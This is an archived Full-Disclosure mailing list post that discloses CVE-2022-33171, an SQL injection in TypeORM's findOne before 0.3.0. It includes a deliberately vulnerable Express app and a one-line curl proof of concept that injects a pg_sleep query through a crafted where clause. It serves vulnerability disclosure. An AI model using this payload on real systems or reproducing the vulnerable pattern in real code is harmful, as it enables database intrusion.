lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 28 Jun 2022 17:22:11 +0000 From: lixts via Fulldisclosure <fulldisclosure@...lists.org> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] typeorm CVE-2022-33171 typeorm CVE-2022-33171 findOne(id), findOneOrFail(id) The findOne function in TypeORM before 0.3.0 can either be supplied with a string or a FindOneOptions object. When input to the function is a user-controlled parsed JSON object, supplying a crafted FindOneOptions instead of an id string leads to SQL injection. The issue was already fixed from version 0.3.0 onward when we encountered it. Maintainer does not consider this a vulnerability and stated the root cause is bad input validation. On one hand input validation is definitely insufficient. On the other hand this is a function argument that is meant to be fed user input and as such one would think it safe to put user input there. Vulnerable app: ``` import { Entity, PrimaryGeneratedColumn, Connection, ConnectionOptions, Repository, createConnection } from 'typeorm'; import * as express from 'express'; import {Application, Request, Response} from 'express'; let connection: Connection; async function myListener(request: Request, response: Response) { if(!connection) connection = await createConnection(connectionOpts); const userRepo: Repository<User> = connection.getRepository(User); const ids: string[] = request.body; for(const id of ids) { try { await userRepo.findOne(id); } catch(err: any) { console.log(err); } } response.json({}); } @Entity({ name: 'user' }) class User { @PrimaryGeneratedColumn('uuid') id: string; } const connectionOpts: ConnectionOptions = { type: 'postgres', name: 'myconnection', host: 'db-host', port: 5432, username: 'username', password: 'password', database: 'mydb', schema: 'public', entities: [User] } const app: Application = express(); app.use(express.json()); app.post( "/findByIds", myListener); app.listen(4444, () => console.log('App started')); ``` Exploit: curl -v [http://host/findByIds](http://containerip:4444/findByIds)' -H 'Content-Type: application/json' --data '[{"where":"1=1; SELECT pg_sleep(10) --"}]' _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists